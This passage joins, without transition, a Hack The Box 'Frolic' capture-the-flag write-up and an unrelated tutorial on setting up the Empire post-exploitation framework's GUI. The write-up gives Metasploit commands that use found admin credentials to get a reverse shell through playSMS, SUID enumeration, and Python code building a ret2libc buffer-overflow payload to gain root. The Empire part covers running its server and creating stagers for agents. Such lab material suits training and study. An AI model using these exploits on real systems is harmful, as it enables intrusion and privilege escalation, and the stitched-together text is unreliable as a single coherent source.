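The index.php chain above is hex, then base64, then a Brainfuck program whose output is the password. Doing it by hand in Burp works once; the block below is an added example (not part of the original write-up) that automates the whole chain, including a small Brainfuck interpreter with a step limit so a malformed program cannot spin forever. The strings from the box are not reproduced; SAMPLE_HEX is a constructed program that prints "A", built by running the same steps in reverse, so the pipeline can be checked offline.

```python
# Added example: hex -> base64 -> Brainfuck -> output, the decode chain from Frolic's index.php.
import base64
import binascii


def run_brainfuck(program, max_steps=1_000_000):
    """Minimal Brainfuck interpreter: 30000 8-bit wrapping cells, ',' reads as 0.
    Returns the program's output as a str."""
    code = [c for c in program if c in "+-<>[].,"]      # everything else is a comment
    # Precompute matching brackets so loop jumps are O(1) and imbalance is caught early.
    jump, stack = {}, []
    for i, c in enumerate(code):
        if c == "[":
            stack.append(i)
        elif c == "]":
            if not stack:
                raise ValueError("unbalanced ']'")
            j = stack.pop()
            jump[i], jump[j] = j, i
    if stack:
        raise ValueError("unbalanced '['")
    tape, ptr, pc, out, steps = [0] * 30000, 0, 0, [], 0
    while pc < len(code):
        steps += 1
        if steps > max_steps:
            raise RuntimeError("step limit hit; refusing to run forever")
        c = code[pc]
        if c == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF
        elif c == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif c == ">":
            ptr = (ptr + 1) % len(tape)
        elif c == "<":
            ptr = (ptr - 1) % len(tape)
        elif c == ".":
            out.append(chr(tape[ptr]))
        elif c == ",":
            tape[ptr] = 0
        elif c == "[" and tape[ptr] == 0:
            pc = jump[pc]              # skip the loop body
        elif c == "]" and tape[ptr] != 0:
            pc = jump[pc]              # back to the matching '['
        pc += 1
    return "".join(out)


def decode_chain(hex_text):
    """hex -> base64 -> Brainfuck source -> executed output."""
    raw = binascii.unhexlify("".join(hex_text.split()))        # tolerate spaces/newlines
    bf_source = base64.b64decode(raw, validate=True).decode("ascii")
    return run_brainfuck(bf_source)


def encode_chain(bf_source):
    """The reverse direction, used only to build the constructed sample below."""
    return binascii.hexlify(base64.b64encode(bf_source.encode("ascii"))).decode("ascii")


# Constructed sample: cell = 8 * 8 + 1 = 65, which prints "A".
SAMPLE_HEX = encode_chain("++++++++[>++++++++<-]>+.")


if __name__ == "__main__":
    print(decode_chain(SAMPLE_HEX))
```

Running untrusted Brainfuck is harmless in itself, but the step limit matters when you feed such a decoder arbitrary blobs from a target: an unterminated loop would otherwise hang your tooling.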
We open /playsms directory and find playsms CMS login page.
![[Image: 18.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-vP3KR-QnQIw/XJ99UaKZGgI/AAAAAAAAduE/D3gCNtwEj0kJ0fiDUEeb_PPD_n8-5JdQgCLcBGAs/s1600/18.png?w=687&ssl=1)
We try username “admin” and password “idkwhatispass” to login and are successfully able to login. So we use Metasploit to get a reverse shell using these credentials.
msf > use exploit/multi/http/playsms_uploadcsv_exec
msf exploit(multi/http/playsms_uploadcsv_exec) > set rhosts 10.10.10.111
msf exploit(multi/http/playsms_uploadcsv_exec) > set rport 9999
msf exploit(multi/http/playsms_uploadcsv_exec) > set targeturi /playsms
msf exploit(multi/http/playsms_uploadcsv_exec) > set username admin
msf exploit(multi/http/playsms_uploadcsv_exec) > set password idkwhatispass
msf exploit(multi/http/playsms_uploadcsv_exec) > set lhost tun0
msf exploit(multi/http/playsms_uploadcsv_exec) > exploit
After getting a reverse shell, we spawn a TTY and start enumerating the system. In /home/ayush we find user.txt, open it and get the first flag. Then we look for files with the SUID bit set and find a binary called "rop" in /home/ayush/.binary.
![[Image: 19.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-i7VAZeuny6E/XJ99U6giS4I/AAAAAAAAduI/okle5J12kxQGSvHtlF9i1USk27Hzc3DlgCLcBGAs/s1600/19.png?w=687&ssl=1)
python -c "import pty; pty.spawn('/bin/bash')"
find / -perm -u=s -type f 2>/dev/null
![[Image: 20.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-9D4SmSKhTck/XJ99VQUrLtI/AAAAAAAAduQ/jYLSQfqaLWsGrGEA1GwJM3_DaMDZMV3PQCLcBGAs/s1600/20.png?w=687&ssl=1)
The target has no gdb, so we download rop to our own machine and look for vulnerabilities. We create a 150-byte pattern with pattern_create.rb, open the binary in gdb and pass the pattern as an argument. The program crashes with a segmentation fault and EIP holds bytes from our pattern, so we control the instruction pointer: the binary is vulnerable to a stack buffer overflow.
gdb -q rop
r <pattern>
![[Image: 24.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-6HwKliLo1W4/XJ99V86IzDI/AAAAAAAAduU/7GUTvcDOoewVJsLtG-JAoSns0rio-r0rwCLcBGAs/s1600/24.png?w=687&ssl=1)
We copy the value of EIP and use “pattern_offset.rb” script to find the EIP offset.
./pattern_offset -q 0x62413762
![[Image: 25.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-s8-6_NspxNY/XJ99WFRGd8I/AAAAAAAAduY/hR0nts1IZUgihPXsV8HndoHVBUINVSN3wCLcBGAs/s1600/25.png?w=687&ssl=1)
Jumping to the stack is hard because we do not know the stack address to jump to. So we use ret2libc: return into libc's system() with "/bin/sh" as its argument, and place exit() after it so the process ends cleanly instead of crashing. On our own machine we first find the addresses of system and exit in gdb, then search libc from system's address onward for a "/bin/sh" string.
p system
p exit
find 0xf7e0c980, +9999999, "/bin/sh"
![[Image: 26.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-Od2NluFJC4c/XJ99WaGodNI/AAAAAAAAduc/bg44jI2v7jQM_IgoroqBZOBmfsZuKJ9cgCLcBGAs/s1600/26.png?w=687&ssl=1)
We write an exploit and check if we can exploit the application to spawn a shell.
![[Image: 27.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-c-B0a89FUf8/XJ99WquVI4I/AAAAAAAAdug/sauoAK8m0FwtCbu3bDwJEq2LLTF0N2rIgCLcBGAs/s1600/27.png?w=687&ssl=1)
We run the exploit in our system and are successfully able to spawn a shell.
r $(python exploit.py)
![[Image: 28.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-AgG60jS5JLA/XJ99W-E7UiI/AAAAAAAAduk/pLXYhmwJ4XcaiySrzCURxtMIhFuw_c6GACLcBGAs/s1600/28.png?w=687&ssl=1)
Now we cannot directly run this exploit on the target system, as we don’t have the addresses of the libc functions of the target system. We are going to change the addresses of the exploit according to the target machine. First, get the address of libc used by the binary. As we don’t have gdb in the target system, so we use readelf, strings and grep to find “system”, “exit” and “/bin/sh” for our exploit.
ldd /home/ayush/.binary/rop |grep libc
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep exit
strings -tx /lib/i386-linux-gnu/libc.so.6 | grep "/bin/sh"
![[Image: 29.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-LCj8i6XHvig/XJ99XAsTmeI/AAAAAAAAduo/ZP1UOE72sfMMOXuV20dFa3q5OBPp_wwxQCLcBGAs/s1600/29.png?w=687&ssl=1)
The values from readelf and strings are offsets into libc; adding each to the base address that ldd printed gives the runtime addresses of system, exit and "/bin/sh" on the target. This only works because the address ldd shows is stable across runs, i.e. ASLR is off on the target; with ASLR on, the base changes on every run and would have to be leaked first. We make these changes to the exploit. You can download the exploit from here.
![[Image: 30.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-cwYO_eqbLes/XJ99YFF1f9I/AAAAAAAAduw/0-DUeV2vbNcQEpInlfAijz-es_b0bLarACLcBGAs/s1600/30.png?w=687&ssl=1)
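The exploit.py itself is only shown as a screenshot. The block below is an added example written for this post, not the author's script: it rebuilds pattern_create/pattern_offset in Python (the EIP value 0x62413762 from the gdb crash above resolves to offset 52) and assembles the ret2libc payload from a libc base plus the symbol offsets, which is the arithmetic the paragraph describes. The libc base and offsets in it are constructed placeholders, not the Frolic values; on the target they come from ldd, readelf -s and strings -tx as shown.

```python
# Added example: Metasploit-style cyclic pattern tools and a ret2libc payload builder (x86, 32-bit).
import string
import struct


def pattern_create(length):
    """Same sequence as pattern_create.rb: Aa0Aa1Aa2...Aa9Ab0Ab1... (unique 4-byte windows
    for the first 20280 bytes)."""
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]


def pattern_offset(eip_value, length=20280):
    """Where do the four bytes that landed in EIP sit in the pattern?
    EIP is little-endian, so 0x62413762 is the bytes b'b7Ab' in the pattern."""
    needle = struct.pack("<I", eip_value).decode("ascii")
    idx = pattern_create(length).find(needle)
    if idx < 0:
        raise ValueError("value not found in pattern; EIP was not overwritten by it")
    return idx


def p32(addr):
    return struct.pack("<I", addr)


def ret2libc_payload(offset, libc_base, system_off, exit_off, binsh_off):
    """padding | &system | &exit (return address for system) | &"/bin/sh" (system's argument).
    Each libc address is base + offset, exactly the arithmetic from the text."""
    system_addr = libc_base + system_off
    exit_addr = libc_base + exit_off
    binsh_addr = libc_base + binsh_off
    return b"A" * offset + p32(system_addr) + p32(exit_addr) + p32(binsh_addr)


def has_bad_bytes(payload):
    """The payload travels in argv via $(python exploit.py): argv strings cannot contain
    NUL, and $(...) strips trailing newlines, so either would silently corrupt it."""
    return b"\x00" in payload or payload.endswith(b"\n")


# Constructed values for the demo only, not the addresses from the box.
DEMO_LIBC_BASE = 0xF7DD0000
DEMO_SYSTEM_OFF = 0x0003A940
DEMO_EXIT_OFF = 0x0002E7B0
DEMO_BINSH_OFF = 0x0015910B


def demo_payload():
    """Derive the offset from the crash value in the post and build a payload."""
    offset = pattern_offset(0x62413762)
    payload = ret2libc_payload(offset, DEMO_LIBC_BASE, DEMO_SYSTEM_OFF,
                               DEMO_EXIT_OFF, DEMO_BINSH_OFF)
    if has_bad_bytes(payload):
        raise ValueError("payload contains NUL or trailing newline; cannot pass it via argv")
    return offset, payload


if __name__ == "__main__":
    offset, payload = demo_payload()
    print(offset, payload)
```

The has_bad_bytes check is the one that bites in practice: a libc address with a 0x00 byte cannot be delivered through argv at all, and one ending in 0x0a loses that byte to command substitution.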
We transfer the exploit to the target machine and run the exploit. As soon as we run the exploit we are able to spawn a shell as the root user.
/home/ayush/.binary/rop $(python /tmp/exploit.py)
With the root shell, we switch to /root, find root.txt and read the final flag.
![[Image: 31.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-s1rbbU6Jcjg/XJ99YXuKrhI/AAAAAAAAdu0/SkNslySnjbwJtRyw6-4dvjSjoH-niZ0lQCLcBGAs/s1600/31.png?w=687&ssl=1)
This is our 8th post in the series of the empire which covers how to use empire as GUI. Empire has a great GUI mechanism, but it’s still developing as it has been released just a while back. For empire GUI to work, we need to download all of its dependencies and this is where it gets a bit complicated. So, first of all, we will download the beta 3.0 version of empire as it’s the only version compatible with the GUI. Using the following commands:
git init
git remote add -t "3.0-beta" -f origin "https://github.com/EmpireProject/Empire"
![[Image: 1.png?w=687]](https://i0.wp.com/3.bp.blogspot.com/-vlBEOdrEPEA/XJupIXlXk0I/AAAAAAAAdqo/sygZx2ezi68kp1KEA_da9zwu-nDrk9-KQCLcBGAs/s1600/1.png?w=687)
Now run the following command as instructed on the GitHub page :
git checkout 3.0-Beta
![[Image: 2.png?w=687]](https://i1.wp.com/4.bp.blogspot.com/-gNT6ElPRYk0/XJupJ0waskI/AAAAAAAAdq8/DvAQgrhTg_wxxgdB9h0iImm57MoUqkSRwCLcBGAs/s1600/2.png?w=687)
Now to install the beta version, type the following command :
./setup/install.sh
![[Image: 3.png?w=687]](https://i0.wp.com/1.bp.blogspot.com/-k3jxlnaU8GQ/XJupKbrd_SI/AAAAAAAAdrA/8qdIi6sjYUgvssPK8tvEn_NuTSFeeOrDgCLcBGAs/s1600/3.png?w=687)
Now run Empire in server mode so the GUI can connect to it. The shared password is what GUI clients authenticate with, so use something stronger than the example value, and the port is the one the GUI will talk to:
./empire --server --shared_password 12345 --port 1337
![[Image: 4.png?w=687]](https://i2.wp.com/3.bp.blogspot.com/-u38oZR5Whiw/XJupKitSVJI/AAAAAAAAdrE/iSSK3wRJbCk7GG7qr3PQzYHZSfHVXR9AwCLcBGAs/s1600/4.png?w=687)
And as shown in the image below, the Empire will start.
![[Image: 5.png?w=687]](https://i1.wp.com/2.bp.blogspot.com/-UMQ6K74zv08/XJupKxjNykI/AAAAAAAAdrI/_MVYN4t6L1Ivq-THOCPlqB-KBhV6w1OFACLcBGAs/s1600/5.png?w=687)
Now, download the GUI of empire from GitHub using the following command :
git clone https://github.com/EmpireProject/EmpireGUI.git
![[Image: 6.png?w=687]](https://i1.wp.com/2.bp.blogspot.com/-9V-4xAmesR4/XJupLPcESZI/AAAAAAAAdrM/W5Uo3EHwfEEnGGqGCDyldCnNeVEBLmy-gCLcBGAs/s1600/6.png?w=687)
Now that GUI of empire and the beta version of empire has been downloaded, we need to install its dependencies for it to work successfully. And for that, we will have to download nodejs first and to download it, type :
apt install nodejs
And in time, it will be installed as shown in the image below :
![[Image: 7.png?w=687]](https://i0.wp.com/4.bp.blogspot.com/-t6wAb4Oq6RE/XJupLn5FWRI/AAAAAAAAdrQ/hbjaTjd76aISqIOEFsEfY3ACgd64ona4QCLcBGAs/s1600/7.png?w=687)
After nodejs, we have to download npm and for that type :
apt install npm
![[Image: 8.png?w=687]](https://i2.wp.com/4.bp.blogspot.com/-m37Du8yOabw/XJupLx65PyI/AAAAAAAAdrU/VzZkDjnxDK8Cu5pclDcqtN1xm9P8iT5ewCLcBGAs/s1600/8.png?w=687)
Once npm is installed, as in the image above, run the following inside the EmpireGUI directory to install the GUI's dependencies:
npm install
![[Image: 9.png?w=687]](https://i0.wp.com/3.bp.blogspot.com/-9no4COXL280/XJupMU6kFrI/AAAAAAAAdrY/qC_1uHIvsZsUL4xwcc6lr0m1__gf-0sPgCLcBGAs/s1600/9.png?w=687)
And then start the npm service, as shown in the image below, with the following command :
npm start
![[Image: 10.png?w=687]](https://i1.wp.com/1.bp.blogspot.com/-Hmw6WO9qerw/XJupIVGhH6I/AAAAAAAAdqs/jsgEFMgclwo0KJpbnb2jqS7mnNsu84o1ACLcBGAs/s1600/10.png?w=687)
After all this, the GUI of empire will start as shown in the image below :
![[Image: 11.png?w=687]](https://i2.wp.com/3.bp.blogspot.com/-Os1zWwSq-aI/XJupIIlzXdI/AAAAAAAAdqk/6gq7xB1lowQCbjucFVDoeMdbFz1yUd2fQCLcBGAs/s1600/11.png?w=687)
Moving further once the GUI of empire is up and running, create a stager and get an agent from the beta version of empire, while getting a session, remember to use port 1337 as that is the port the GUI works on.
![[Image: 12.png?w=687]](https://i2.wp.com/2.bp.blogspot.com/-MhAoI2WGIG0/XJupJIXXMJI/AAAAAAAAdqw/QpHHUC7vz14eg9P1g7LZgdqh-peC29MjACLcBGAs/s1600/12.png?w=687)
Now, on the GUI, log in using your IP and port and other details as shown in the image below :
![[Image: 13.png?w=687]](https://i0.wp.com/1.bp.blogspot.com/-msCTMzeNiHo/XJupJa4FK4I/AAAAAAAAdq0/l0zJlRGN4SQZgL8sxdTmp_bRpjQ5T3A1ACLcBGAs/s1600/13.png?w=687)
Once logged in, it shows all the sessions you have, as in the image below. All shell commands work there as shown. As the GUI is still in development, it cannot be used for post-exploitation yet, but it is handy for managing multiple sessions and helps you understand how Empire works.
![[Image: 14.png?w=687]](https://i1.wp.com/4.bp.blogspot.com/-iK06dA6gzt4/XJupJ7sV6OI/AAAAAAAAdq4/xlVELD2f42U2d73lC_HGZ9R3NMsZqc4eQCLcBGAs/s1600/14.png?w=687)